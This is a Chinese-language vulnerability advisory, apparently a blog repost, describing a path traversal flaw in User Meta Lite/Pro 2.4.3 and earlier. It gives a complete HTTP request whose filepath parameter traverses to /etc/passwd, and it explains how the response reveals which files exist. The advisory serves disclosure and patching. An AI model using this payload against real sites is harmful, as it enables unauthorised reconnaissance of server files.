描述

该插件不验证其um_show_uploaded_file AJAX操作的filepath参数，这可能允许低权限用户（如subscriber）通过路径遍历有效负载枚举web服务器上的本地文件

WordPress的一个易于使用的用户配置文件和管理插件，允许用户登录、重置密码、配置文件更新和使用extra进行用户注册字段，所有字段都位于前端，还有更多字段。用户Meta Pro是一个多功能用户WordPress的配置文件生成器和用户管理插件市场上的功能。用户元旨在成为您的唯一访问插件用户管理。
 

受影响的版本

User Meta Lite 2.4.3及以下版本
User Meta Pro 2.4.3及以下版本
 

漏洞复现

作为订阅者，在嵌入文件上载字段的页面/帖子上提交虚拟图像，拦截请求并更改文件路径参数

POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: */*

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 158

Connection: close

Cookie: [subscriber+]



field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=4286c1c56a&is_ajax=true

如果响应包含um_remove_file文件，则该文件存在于服务器上，否则不存在

影响

经过身份验证的攻击者可以使用该漏洞枚举基于盲方法的本地服务器文件。
 

解决方案

更新至User Meta/User Meta Pro 2.4.4
 

感谢您的来访，获取更多精彩文章请收藏本站。